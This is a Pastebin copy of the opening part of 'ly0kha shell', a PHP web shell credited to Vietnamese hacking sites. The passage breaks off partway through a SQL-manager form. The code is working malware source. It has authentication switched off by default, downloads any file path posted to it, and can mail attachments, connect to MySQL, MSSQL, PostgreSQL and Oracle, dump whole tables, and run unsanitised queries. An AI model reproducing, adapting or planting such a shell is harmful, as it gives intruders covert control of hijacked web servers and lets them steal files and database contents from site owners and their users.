daily pastebin goal
93%
SHARE
TWEET

Untitled

a guest Oct 29th, 2011 15,269 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <??><?php
  2. /******************************************************************************************************/
  3. /*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
  4. /*  (c)oded by SnIpEr_SA,Developed by Ly0kha
  5. /*  MAIL http://vnbrain.net , http://vnhack.net
  6. /******************************************************************************************************/
  7. /* ~~~  | Options  ~~~ */
  8. // ~~~~| Language
  9. // $language='eng' - english (english)
  10. // $language='ar' - arabi (arabi)
  11. $language='eng';
  12. // ~~~~~~~ | Authentification
  13. // $auth = 1; -( authentification = On  )
  14. // $auth = 0; -  ( authentification = Off )
  15. $auth = 0;
  16. // (Login & Password for access)
  17. //(CHANGE THIS!!!)
  18. //   'ly0kha'
  19. // ma hoa user va pass  bang thuat toan md5
  20. $name='0963b32c662bde64ababb0bee7825fc3'; //(user login)
  21. $pass='0963b32c662bde64ababb0bee7825fc3'; // (user password)
  22. /******************************************************************************************************/
  23.  
  24. echo "".htmlspecialchars($copy)."";
  25. error_reporting(0);
  26. set_magic_quotes_runtime(0);
  27. @set_time_limit(0);
  28. @ini_set('max_execution_time',0);
  29. @ini_set('output_buffering',0);
  30. $safe_mode = @ini_get('safe_mode');
  31. $version = '1.31';
  32. if(version_compare(phpversion(), '4.1.0') == -1)
  33.  {
  34.  $_POST   = &$HTTP_POST_VARS;
  35.  $_GET    = &$HTTP_GET_VARS;
  36.  $_SERVER = &$HTTP_SERVER_VARS;
  37.  $_COOKIE = &$HTTP_COOKIE_VARS;
  38.  }
  39. if (@get_magic_quotes_gpc())
  40.  {
  41.  foreach ($_POST as $k=>$v)
  42.   {
  43.   $_POST[$k] = stripslashes($v);
  44.   }
  45.  foreach ($_COOKIE as $k=>$v)
  46.   {
  47.   $_COOKIE[$k] = stripslashes($v);
  48.   }
  49.  }
  50.  
  51. if($auth == 1) {
  52. if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass)
  53.    {
  54.    header('WWW-Authenticate: Basic realm="ly0kha shell"');
  55.    header('HTTP/1.0 401 Unauthorized');
  56.    exit("<b><a href=http://vnbrain.net>ly0kha</a> : Access Denied</b>");
  57.    }
  58. }
  59. $head = '<!--  ly0kha  -->
  60. <html>
  61. <head>
  62. <meta http-equiv="Content-Language" content="ar-sa">
  63. <meta name="GENERATOR" content="Microsoft FrontPage 6.0">
  64. <meta name="ProgId" content="FrontPage.Editor.Document">
  65. <meta http-equiv="Content-Type" content="text/html; charset=windows-1256">
  66. <title>ly0kha shell</title>
  67.  
  68.  
  69.  
  70. <STYLE>
  71.  
  72. BODY
  73. {
  74.        SCROLLBAR-FACE-COLOR: #000000; SCROLLBAR-HIGHLIGHT-COLOR: #000000; SCROLLBAR-SHADOW-COLOR: #000000; COLOR: #ffffff; SCROLLBAR-3DLIGHT-COLOR: #726456; SCROLLBAR-ARROW-COLOR: #726456; SCROLLBAR-TRACK-COLOR: #292929; FONT-FAMILY: Verdana; SCROLLBAR-DARKSHADOW-COLOR: #726456
  75. }
  76.  
  77. tr {
  78. BORDER-RIGHT:  #cccccc 1px solid;
  79. BORDER-TOP:    #cccccc 1px solid;
  80. BORDER-LEFT:   #cccccc 1px solid;
  81. BORDER-BOTTOM: #cccccc 1px solid;
  82. color: #ffffff;
  83. }
  84. td {
  85. BORDER-RIGHT:  #cccccc 1px solid;
  86. BORDER-TOP:    #cccccc 1px solid;
  87. BORDER-LEFT:   #cccccc 1px solid;
  88. BORDER-BOTTOM: #cccccc 1px solid;
  89. color: #cccccc;
  90. }
  91. .table1 {
  92. BORDER: 1;
  93. BACKGROUND-COLOR: #000000;
  94. color: #333333;
  95. }
  96. .td1 {
  97. BORDER: 1;
  98. font: 7pt tahoma;
  99. color: #ffffff;
  100. }
  101. .tr1 {
  102. BORDER: 1;
  103. color: #cccccc;
  104. }
  105. table {
  106. BORDER:  #eeeeee  outset;
  107. BACKGROUND-COLOR: #000000;
  108. color: #cccccc;
  109. }
  110. input {
  111. BORDER-RIGHT:  #990000 1px solid;
  112. BORDER-TOP:    #990000 1px solid;
  113. BORDER-LEFT:   #990000 1px solid;
  114. BORDER-BOTTOM: #990000 1px solid;
  115. BACKGROUND-COLOR: #333333;
  116. font: 9pt tahoma;
  117. color: #ffffff;
  118. }
  119. select {
  120. BORDER-RIGHT:  #ffffff 1px solid;
  121. BORDER-TOP:    #999999 1px solid;
  122. BORDER-LEFT:   #999999 1px solid;
  123. BORDER-BOTTOM: #ffffff 1px solid;
  124. BACKGROUND-COLOR: #000000;
  125. font: 9pt tahoma;
  126. color: #CCCCCC;;
  127. }
  128. submit {
  129. BORDER:  buttonhighlight 1 outset;
  130. BACKGROUND-COLOR: #272727;
  131. width: 40%;
  132. color: #cccccc;
  133. }
  134. textarea {
  135. BORDER-RIGHT:  #ffffff 1px solid;
  136. BORDER-TOP:    #999999 1px solid;
  137. BORDER-LEFT:   #999999 1px solid;
  138. BORDER-BOTTOM: #ffffff 1px solid;
  139. BACKGROUND-COLOR: #333333;
  140. font: Fixedsys bold;
  141. color: #ffffff;
  142. }
  143. BODY {
  144. margin: 1;
  145. color: #cccccc;
  146. background-color: #000000;
  147. }
  148. A:link {COLOR:red; TEXT-DECORATION: none}
  149. A:visited { COLOR:red; TEXT-DECORATION: none}
  150. A:active {COLOR:red; TEXT-DECORATION: none}
  151. A:hover {color:blue;TEXT-DECORATION: none}
  152.  
  153. </STYLE>
  154. <script language=\'javascript\'>
  155. function hide_div(id)
  156. {
  157.  document.getElementById(id).style.display = \'none\';
  158.  document.cookie=id+\'=0;\';
  159. }
  160. function show_div(id)
  161. {
  162.  document.getElementById(id).style.display = \'block\';
  163.  document.cookie=id+\'=1;\';
  164. }
  165. function change_divst(id)
  166. {
  167.  if (document.getElementById(id).style.display == \'none\')
  168.    show_div(id);
  169.  else
  170.    hide_div(id);
  171. }
  172. </script>';
  173. class zipfile
  174. {
  175.     var $datasec      = array();
  176.     var $ctrl_dir     = array();
  177.     var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
  178.     var $old_offset   = 0;
  179.     function unix2DosTime($unixtime = 0) {
  180.         $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
  181.         if ($timearray['year'] < 1980) {
  182.             $timearray['year']    = 1980;
  183.             $timearray['mon']     = 1;
  184.             $timearray['mday']    = 1;
  185.             $timearray['hours']   = 0;
  186.             $timearray['minutes'] = 0;
  187.             $timearray['seconds'] = 0;
  188.         }
  189.         return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
  190.                 ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
  191.     }
  192.     function addFile($data, $name, $time = 0)
  193.     {
  194.         $name     = str_replace('\\', '/', $name);
  195.         $dtime    = dechex($this->unix2DosTime($time));
  196.         $hexdtime = '\x' . $dtime[6] . $dtime[7]
  197.                   . '\x' . $dtime[4] . $dtime[5]
  198.                   . '\x' . $dtime[2] . $dtime[3]
  199.                   . '\x' . $dtime[0] . $dtime[1];
  200.         eval('$hexdtime = "' . $hexdtime . '";');
  201.         $fr   = "\x50\x4b\x03\x04";
  202.         $fr   .= "\x14\x00";
  203.         $fr   .= "\x00\x00";
  204.         $fr   .= "\x08\x00";
  205.         $fr   .= $hexdtime;
  206.         $unc_len = strlen($data);
  207.         $crc     = crc32($data);
  208.         $zdata   = gzcompress($data);
  209.         $zdata   = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
  210.         $c_len   = strlen($zdata);
  211.         $fr      .= pack('V', $crc);
  212.         $fr      .= pack('V', $c_len);
  213.         $fr      .= pack('V', $unc_len);
  214.         $fr      .= pack('v', strlen($name));
  215.         $fr      .= pack('v', 0);
  216.         $fr      .= $name;
  217.         $fr .= $zdata;
  218.         $this -> datasec[] = $fr;
  219.         $cdrec = "\x50\x4b\x01\x02";
  220.         $cdrec .= "\x00\x00";
  221.         $cdrec .= "\x14\x00";
  222.         $cdrec .= "\x00\x00";
  223.         $cdrec .= "\x08\x00";
  224.         $cdrec .= $hexdtime;
  225.         $cdrec .= pack('V', $crc);
  226.         $cdrec .= pack('V', $c_len);
  227.         $cdrec .= pack('V', $unc_len);
  228.         $cdrec .= pack('v', strlen($name) );
  229.         $cdrec .= pack('v', 0 );
  230.         $cdrec .= pack('v', 0 );
  231.         $cdrec .= pack('v', 0 );
  232.         $cdrec .= pack('v', 0 );
  233.         $cdrec .= pack('V', 32 );
  234.         $cdrec .= pack('V', $this -> old_offset );
  235.         $this -> old_offset += strlen($fr);
  236.         $cdrec .= $name;
  237.         $this -> ctrl_dir[] = $cdrec;
  238.     }
  239.     function file()
  240.     {
  241.         $data    = implode('', $this -> datasec);
  242.         $ctrldir = implode('', $this -> ctrl_dir);
  243.         return
  244.             $data .
  245.             $ctrldir .
  246.             $this -> eof_ctrl_dir .
  247.             pack('v', sizeof($this -> ctrl_dir)) .
  248.             pack('v', sizeof($this -> ctrl_dir)) .
  249.             pack('V', strlen($ctrldir)) .
  250.             pack('V', strlen($data)) .
  251.             "\x00\x00";
  252.     }
  253. }
  254. function compress(&$filename,&$filedump,$compress)
  255.  {
  256.     global $content_encoding;
  257.     global $mime_type;
  258.     if ($compress == 'bzip' && @function_exists('bzcompress'))
  259.      {
  260.         $filename  .= '.bz2';
  261.         $mime_type = 'application/x-bzip2';
  262.         $filedump = bzcompress($filedump);
  263.      }
  264.      else if ($compress == 'gzip' && @function_exists('gzencode'))
  265.      {
  266.         $filename  .= '.gz';
  267.         $content_encoding = 'x-gzip';
  268.         $mime_type = 'application/x-gzip';
  269.         $filedump = gzencode($filedump);
  270.      }
  271.      else if ($compress == 'zip' && @function_exists('gzcompress'))
  272.      {
  273.              $filename .= '.zip';
  274.         $mime_type = 'application/zip';
  275.         $zipfile = new zipfile();
  276.         $zipfile -> addFile($filedump, substr($filename, 0, -4));
  277.         $filedump = $zipfile -> file();
  278.      }
  279.      else
  280.      {
  281.              $mime_type = 'application/octet-stream';
  282.      }
  283.  }
  284. function mailattach($to,$from,$subj,$attach)
  285.  {
  286.  $headers  = "From: $from\r\n";
  287.  $headers .= "MIME-Version: 1.0\r\n";
  288.  $headers .= "Content-Type: ".$attach['type'];
  289.  $headers .= "; name=\"".$attach['name']."\"\r\n";
  290.  $headers .= "Content-Transfer-Encoding: base64\r\n\r\n";
  291.  $headers .= chunk_split(base64_encode($attach['content']))."\r\n";
  292.  if(@mail($to,$subj,"",$headers)) { return 1; }
  293.  return 0;
  294.  }
  295. class my_sql
  296.  {
  297.  var $host = 'localhost';
  298.  var $port = '';
  299.  var $user = '';
  300.  var $pass = '';
  301.  var $base = '';
  302.  var $db   = '';
  303.  var $connection;
  304.  var $res;
  305.  var $error;
  306.  var $rows;
  307.  var $columns;
  308.  var $num_rows;
  309.  var $num_fields;
  310.  var $dump;
  311.  
  312.  function connect()
  313.   {
  314.           switch($this->db)
  315.      {
  316.            case 'MySQL':
  317.             if(empty($this->port)) { $this->port = '3306'; }
  318.             if(!function_exists('mysql_connect')) return 0;
  319.             $this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass);
  320.             if(is_resource($this->connection)) return 1;
  321.            break;
  322.      case 'MSSQL':
  323.       if(empty($this->port)) { $this->port = '1433'; }
  324.             if(!function_exists('mssql_connect')) return 0;
  325.             $this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass);
  326.       if($this->connection) return 1;
  327.      break;
  328.      case 'PostgreSQL':
  329.       if(empty($this->port)) { $this->port = '5432'; }
  330.       $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'";
  331.       if(!function_exists('pg_connect')) return 0;
  332.       $this->connection = @pg_connect($str);
  333.       if(is_resource($this->connection)) return 1;
  334.      break;
  335.      case 'Oracle':
  336.       if(!function_exists('ocilogon')) return 0;
  337.       $this->connection = @ocilogon($this->user, $this->pass, $this->base);
  338.       if(is_resource($this->connection)) return 1;
  339.      break;
  340.      }
  341.     return 0;
  342.   }
  343.  
  344.  function select_db()
  345.   {
  346.    switch($this->db)
  347.     {
  348.           case 'MySQL':
  349.            if(@mysql_select_db($this->base,$this->connection)) return 1;
  350.     break;
  351.     case 'MSSQL':
  352.            if(@mssql_select_db($this->base,$this->connection)) return 1;
  353.     break;
  354.     case 'PostgreSQL':
  355.      return 1;
  356.     break;
  357.     case 'Oracle':
  358.      return 1;
  359.     break;
  360.     }
  361.    return 0;
  362.   }
  363.  
  364.  function query($query)
  365.   {
  366.    $this->res=$this->error='';
  367.    switch($this->db)
  368.     {
  369.           case 'MySQL':
  370.      if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection)))
  371.       {
  372.       $this->error = @mysql_error($this->connection);
  373.       return 0;
  374.       }
  375.      else if(is_resource($this->res)) { return 1; }
  376.      return 2;
  377.           break;
  378.     case 'MSSQL':
  379.      if(false===($this->res=@mssql_query($query,$this->connection)))
  380.       {
  381.       $this->error = 'Query error';
  382.       return 0;
  383.       }
  384.       else if(@mssql_num_rows($this->res) > 0) { return 1; }
  385.      return 2;
  386.     break;
  387.     case 'PostgreSQL':
  388.      if(false===($this->res=@pg_query($this->connection,$query)))
  389.       {
  390.       $this->error = @pg_last_error($this->connection);
  391.       return 0;
  392.       }
  393.       else if(@pg_num_rows($this->res) > 0) { return 1; }
  394.      return 2;
  395.     break;
  396.     case 'Oracle':
  397.      if(false===($this->res=@ociparse($this->connection,$query)))
  398.       {
  399.       $this->error = 'Query parse error';
  400.       }
  401.      else
  402.       {
  403.       if(@ociexecute($this->res))
  404.        {
  405.        if(@ocirowcount($this->res) != 0) return 2;
  406.        return 1;
  407.        }
  408.       $error = @ocierror();
  409.       $this->error=$error['message'];
  410.       }
  411.     break;
  412.     }
  413.   return 0;
  414.   }
  415.  function get_result()
  416.   {
  417.    $this->rows=array();
  418.    $this->columns=array();
  419.    $this->num_rows=$this->num_fields=0;
  420.    switch($this->db)
  421.     {
  422.           case 'MySQL':
  423.            $this->num_rows=@mysql_num_rows($this->res);
  424.            $this->num_fields=@mysql_num_fields($this->res);
  425.            while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res)));
  426.            @mysql_free_result($this->res);
  427.            if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
  428.     break;
  429.     case 'MSSQL':
  430.            $this->num_rows=@mssql_num_rows($this->res);
  431.            $this->num_fields=@mssql_num_fields($this->res);
  432.            while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res)));
  433.            @mssql_free_result($this->res);
  434.            if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;};
  435.     break;
  436.     case 'PostgreSQL':
  437.            $this->num_rows=@pg_num_rows($this->res);
  438.            $this->num_fields=@pg_num_fields($this->res);
  439.            while(false !== ($this->rows[] = @pg_fetch_assoc($this->res)));
  440.            @pg_free_result($this->res);
  441.            if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
  442.     break;
  443.     case 'Oracle':
  444.      $this->num_fields=@ocinumcols($this->res);
  445.      while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++;
  446.      @ocifreestatement($this->res);
  447.      if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
  448.     break;
  449.     }
  450.    return 0;
  451.   }
  452.  function dump($table)
  453.   {
  454.    if(empty($table)) return 0;
  455.    $this->dump=array();
  456.    $this->dump[0] = '##';
  457.    $this->dump[1] = '## --------------------------------------- ';
  458.    $this->dump[2] = '##  Created: '.date ("d/m/Y H:i:s");
  459.    $this->dump[3] = '## Database: '.$this->base;
  460.    $this->dump[4] = '##    Table: '.$table;
  461.    $this->dump[5] = '## --------------------------------------- ';
  462.    switch($this->db)
  463.     {
  464.           case 'MySQL':
  465.            $this->dump[0] = '## MySQL dump';
  466.            if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0;
  467.            if(!$this->get_result()) return 0;
  468.            $this->dump[] = $this->rows[0]['Create Table'];
  469.      $this->dump[] = '## --------------------------------------- ';
  470.            if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0;
  471.            if(!$this->get_result()) return 0;
  472.            for($i=0;$i<$this->num_rows;$i++)
  473.             {
  474.       foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);}
  475.             $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
  476.             }
  477.     break;
  478.     case 'MSSQL':
  479.      $this->dump[0] = '## MSSQL dump';
  480.      if($this->query('SELECT * FROM '.$table)!=1) return 0;
  481.            if(!$this->get_result()) return 0;
  482.            for($i=0;$i<$this->num_rows;$i++)
  483.             {
  484.       foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
  485.             $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
  486.             }
  487.     break;
  488.     case 'PostgreSQL':
  489.      $this->dump[0] = '## PostgreSQL dump';
  490.      if($this->query('SELECT * FROM '.$table)!=1) return 0;
  491.            if(!$this->get_result()) return 0;
  492.            for($i=0;$i<$this->num_rows;$i++)
  493.             {
  494.       foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
  495.             $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
  496.             }
  497.     break;
  498.     case 'Oracle':
  499.       $this->dump[0] = '## ORACLE dump';
  500.       $this->dump[]  = '## under construction';
  501.     break;
  502.     default:
  503.      return 0;
  504.     break;
  505.     }
  506.    return 1;
  507.   }
  508.  function close()
  509.   {
  510.    switch($this->db)
  511.     {
  512.           case 'MySQL':
  513.            @mysql_close($this->connection);
  514.     break;
  515.     case 'MSSQL':
  516.      @mssql_close($this->connection);
  517.     break;
  518.     case 'PostgreSQL':
  519.      @pg_close($this->connection);
  520.     break;
  521.     case 'Oracle':
  522.      @oci_close($this->connection);
  523.     break;
  524.     }
  525.   }
  526.  function affected_rows()
  527.   {
  528.    switch($this->db)
  529.     {
  530.           case 'MySQL':
  531.            return @mysql_affected_rows($this->res);
  532.     break;
  533.     case 'MSSQL':
  534.      return @mssql_affected_rows($this->res);
  535.     break;
  536.     case 'PostgreSQL':
  537.      return @pg_affected_rows($this->res);
  538.     break;
  539.     case 'Oracle':
  540.      return @ocirowcount($this->res);
  541.     break;
  542.     default:
  543.      return 0;
  544.     break;
  545.     }
  546.   }
  547.  }
  548. if(!empty($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name']))
  549.  {
  550.   if(!$file=@fopen($_POST['d_name'],"r")) { err(1,$_POST['d_name']); $_POST['cmd']=""; }
  551.   else
  552.    {
  553.     @ob_clean();
  554.     $filename = @basename($_POST['d_name']);
  555.     $filedump = @fread($file,@filesize($_POST['d_name']));
  556.     fclose($file);
  557.     $content_encoding=$mime_type='';
  558.     compress($filename,$filedump,$_POST['compress']);
  559.     if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); }
  560.     header("Content-type: ".$mime_type);
  561.     header("Content-disposition: attachment; filename=\"".$filename."\";");
  562.     echo $filedump;
  563.     exit();
  564.    }
  565.  }
  566.  
  567. if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }
  568. if(isset($_GET['sqlman'])) {
  569. session_start();
  570. $action = $HTTP_GET_VARS['action'];
  571. $pagemax=20; // Maximum rows displaed per page, change to display more or less rows per page.
  572. function show_login($dbnamearray){
  573.      $hostdefault="localhost";
  574.                 echo"<table>";
  575.                 echo"<form  name='showlogin' method='post' action='$action'>";
  576.         if(count($hostdefault) > 1){
  577.             echo"<tr><td>??? C???????:</td><td><select name=host>";
  578.             for($x=0; $x < count($hostdefault);$x++){
  579.                 echo"<option value=$hostdefault[$x]>$hostdefault[$x]";
  580.             }
  581.             echo"</select></td></tr>\n";
  582.         }else{
  583.             echo"<tr><td>Server Databases:</td><td><input type=text name='host' size=15 value=$hostdefault /></td></tr>\n";
  584.                 }
  585.         echo"<tr><td>Username:</td><td><input type=text name='userid' size=15 /></td></tr>\n";
  586.                 echo"<tr><td>Password:</td><td><input type=password name='pword1' size=15 /></td></tr>\n";
  587.  
  588.                 If($dbnamearray != ""){
  589.                         echo"<tr><td>?C?IE C?E?C?CE:</td><td><select name='dbna'>\n";
  590.                         for ($i =0; $i < count($dbnamearray); $i++) {
  591.                                 $dbn=$dbnamearray[$i];
  592.                                 echo"<option value=$dbn>$dbn";
  593.                         }
  594.                 }
  595.                 echo"<tr><td><input class=ser type='submit' name='login' value='login' /></td>\n";
  596.                 echo"<td><input class=ser type=reset name='reset' value='Clear' /></td></tr>\n";
  597.                 echo"</form></table>\n";
  598.  
  599. }
  600.  
  601. function dbrestrict(){
  602. if(isset($_SESSION['user'])){
  603.     $user=$_SESSION['user'];
  604.  
  605.     switch($user){
  606.  
  607.     //Edit these ** values. You can add more case statements.
  608.         case '**User**':
  609.             $dbnamearray= array('**dbname**', '**dbname2**', '**dbname**');
  610.             break;
  611.      //end edit values
  612.  
  613.         default:
  614.             $_SESSION['defaltuser']=true;
  615.             $dbnamearray = array();
  616.             $link = connectmysql();
  617.  
  618.             $db_list = mysql_list_dbs($link); //$db_list
  619.                     $cnt = mysql_num_rows($db_list);
  620.                     for ($i =0; $i < $cnt; $i++) {
  621.                             $dbnamearray[$i]= mysql_db_name($db_list, $i);
  622.                     }
  623.     }
  624.     return $dbnamearray;
  625. }
  626. }
  627. //***************************************************************
  628. //function showdbs($dbnamearray, $backuppath){
  629. function showdbs($dbnamearray){
  630.     //$backuppath=addslashes($backuppath);
  631.        echo"<table>\n";
  632.        for ($i =0; $i < count($dbnamearray); $i++) {
  633.                     echo"<tr><td>";
  634.             $dbn=$dbnamearray[$i];
  635.                         $va="Go to the base $dbn";
  636.                         goto(' ', $dbn,$action, 'but', 'db', $va );
  637.  
  638.             $dbs=mysize($dbnamearray[$i],"");
  639.             echo"</td><td>$dbs</td></tr>\n";
  640.         }
  641.     echo"</table>\n";
  642. }
  643.  
  644.  
  645. //********************* Show Logout Button **********
  646. function endsess(){
  647. echo"<form method='post' name='endsess' action='$action'>\n";
  648. echo"<input class=ser type='submit' name='logout' value='Logout' />\n";
  649. echo"</form>";
  650. }
  651.  
  652. //********************************************************************
  653. function connectmysql(){
  654.         //Connects to the MySQL Database.
  655.  
  656.  
  657.         if (isset($_SESSION['user']) && isset($_SESSION['password'])){
  658.                  $user = $_SESSION['user'];
  659.                  $pass = $_SESSION['password'];
  660.         }else{
  661.         display_foot();
  662.         echo"\n</body>\n</html>";
  663.                 exit();
  664.         }
  665.         $link = @mysql_connect($_SESSION['host'], $_SESSION['user'], $_SESSION['password']);
  666.         if(! $link){
  667.                 echo"<div class='error'>\n";
  668.                 echo"Unable to connect to the database server. <BR>";
  669.                 echo"The Host: $_SESSION[host], Username: $user Or call confidential Ktae. <br>";
  670.                 echo"As well out of the record attempt once Akharie.\n";
  671.                 echo"</div>\n";
  672.  
  673.         return false;
  674.                 exit();
  675.         } else{
  676.                 return $link;
  677.         }
  678.  
  679. }
  680. //*********************************************************************
  681. function connectdb($db, $link){
  682.         if(! mysql_select_db($db,$link)){
  683.                 echo"Unable to locate database $db.<br> Please try again later.\n";
  684.                 exit();
  685.         }
  686. }
  687. //*********************************************************************
  688. function exequery($sql, $tablename, $db){
  689.         $result= @mysql_query( $sql );
  690.         if($result){
  691.                 //echo "Query successful";
  692.                 return $result;
  693.         }else{
  694.                 echo"Sorry your Query failed: $sql <br> error:".mysql_error()."\n";
  695.                 return false;
  696.         }
  697. }
  698.  
  699.  
  700. //***************************************************
  701. $fieldtypes = array("BIGINT", "BLOB", "CHAR", "DATE", "DATETIME", "DECIMAL", "DOUBLE", "ENUM", "FLOAT",
  702.   "INT", "INTEGER", "LONGBLOB", "LONGTEXT", "MEDIUMBLOB", "MEDIUMINT", "MEDIUMTEXT", "NUMERIC", "PRECISION",
  703.  "REAL","SET", "SMALLINT", "TEXT", "TIME", "TIMESTAMP", "TINYBLOB", "TINYINT", "TINYTEXT", "VARCHAR", "YEAR" );
  704.  
  705.  
  706. //****************** Search Form ****************************
  707. function searchtableform($tablename, $dbname){
  708.         echo"<form method='post' action='$action'>\n";
  709.         echo"<input type=hidden name='dbname' value='$dbname' />\n";
  710.         echo"<input type=hidden name='tablename' value='$tablename' />\n";
  711.         echo"<input type=text name='searchval' />\n";
  712.         echo"<input class=ser type=submit name='search' value='Search $tablename' />\n";
  713.         echo"</form>\n";
  714. }
  715. //********************* Search *************************
  716. function searcht($tablename, $dbname, $searchval){
  717.         if(! empty($searchval)){
  718.                 //        $searchval= str_replace(";",' ', $searchval);
  719.         $result=exequery("Select * from $tablename", $tablename, $dbname);
  720.                 //$result=mysql_query("Select * from $tablename");
  721.                 $num = mysql_num_fields($result);
  722.                 $fields = mysql_list_fields($dbname, $tablename);
  723.                 $whr="where ";
  724.                 $tok=explode(" ",$searchval);
  725.                 for ($t =0; $t < count($tok); $t++){
  726.                         for ( $c = 0; $c < $num; $c++){
  727.                                 $fn =mysql_field_name($fields, $c);
  728.                                 $whr .=" $fn like '%$tok[$t]%' or ";
  729.                         }
  730.                 }
  731.                 $whr=trim(substr_replace($whr, " ", -3));
  732.                 $query="Select * from $tablename $whr";
  733.                 $result=exequery($query, $tablename, $dbname);
  734.                 return $result;
  735.         }
  736.  
  737. }
  738. //*********************GOTO buttons*************************
  739. //provides a form and button.
  740.  
  741. function goto($tablename, $dbname, $action, $class, $name, $va ){
  742.         //Adds a button.
  743.  
  744.         echo"<form action='$action' method='post' >\n";
  745.  
  746.                 if(! eregi('tablestart', $name)){
  747.                         echo"<input type=hidden name=dbname value='$dbname' />\n";
  748.                         echo"<input type=hidden name=tablename value='$tablename' />\n";
  749.                 }
  750.                 echo"<input class=$class type=submit  value='$va' name='$name' />\n";
  751.                 //echo"<input class=$class type=submit  value='$action' name=$name>";
  752.         echo"</form>\n";
  753.  
  754.         //echo"<a class=$class href=$action>$va</a>";
  755.         //}
  756. }
  757.  
  758. //*********************** ShowDB ***********************************
  759. function showdb(){
  760. //function showdb($backuppath){
  761.  
  762.         $link=connectmysql();
  763.         if ($link){
  764.         echo"<div class='db'>";
  765.                 echo"<div class='cream'>\n";
  766.                 echo"<h2 class=h >The establishment of a new base</h2>\n";
  767.  
  768.                 echo"<form name=cdb action='$action' method='post' >\n";
  769.                 echo"Name of new rule: <input type=text name=ndbname />\n";
  770.                 echo"<br /><br /><input class=but type='submit' name='cndb' value='The establishment of a new base' />\n";
  771.                 echo"</form><br />";
  772.                 echo"</div>";
  773.                 echo"<h2 class=h >The list of rules available</h2>\n";
  774.                 //Restrict the database for users
  775.         $dbnamearray= dbrestrict();
  776.         showdbs($dbnamearray);
  777.         echo"</div>";
  778.            }
  779.  
  780. }
  781.  
  782. //********************** BuildWhr ******************************
  783. //Builds the Where part of queries.
  784.  
  785. function buildwhr($pk, $pv){
  786.         $whr="";
  787.         $pn =count($pv);
  788.         for($t =0; $t < $pn; $t++){
  789.                 $whr.="$pk[$t]='$pv[$t]'";
  790.                 if($t < $pn-1){
  791.                         $whr.=" and ";
  792.                 }
  793.         }
  794.         if ($whr !=" "){
  795.                 return $whr;
  796.         }else{
  797.                 return false;
  798.         }
  799. }
  800. //***********************ADD Record ******************
  801.  
  802. function addrecord($tablename, $dbname, $array){
  803.      $result=exequery("Select * from $tablename", $tablename, $dbname);
  804.         //$result = @mysql_query( "Select * from $tablename" );
  805.  
  806.         $flds = mysql_num_fields($result);
  807.         //$fields = mysql_list_fields($dbname, $tablename);
  808.            $qry=" ";
  809.     $query = "Insert into $tablename Values( ";
  810.         for ($x =0; $x < $flds; $x++){
  811.         //Multiple Select values for SET
  812.  
  813.        if(is_array($array[$x])){
  814.             $mval="";
  815.             for($m=0; $m < count($array[$x]); $m++){
  816.                 if($m+1 == count($array[$x])){
  817.                     $mval.= AddSlashes($array[$x][$m]);
  818.  
  819.                 }else{
  820.                     $mval.= AddSlashes($array[$x][$m]).",";
  821.                 }
  822.                 $fval = $mval;
  823.             }
  824.         }else{
  825.                     $fval = AddSlashes($array[$x]);
  826.         }
  827.                 $qry .= "'$fval'";
  828.                 if ($x < $flds-1){
  829.                         $qry.= ", ";
  830.                 }
  831.         }
  832.         $query .= $qry.")";
  833.    // echo"qry: $qry";
  834.         $result=exequery($query, $tablename, $dbname);
  835.         if($result){
  836.                 return $result;
  837.         }else{
  838.                 return false;
  839.         }
  840. }
  841.  
  842. //**********************ADD Form **********************
  843.  
  844. function addform($tablename, $dbname){
  845.  //Display the field names and input boxes
  846.  echo"<form action='$action' method='post'>\n";
  847.  echo"<table border=0 width='100%' align='center'>\n";
  848.  echo"<tr class=head><td>Field Name</td><td>Type</td><td>Value</td></tr>\n";
  849.   $result=exequery("Select * from $tablename", $tablename, $dbname);
  850.  //$result = @mysql_query( "Select * from $tablename" );
  851.  $flds = mysql_num_fields($result);
  852.  $fields = mysql_list_fields($dbname, $tablename);
  853.  echo"<input type=hidden name=tablename value='$tablename' />\n";
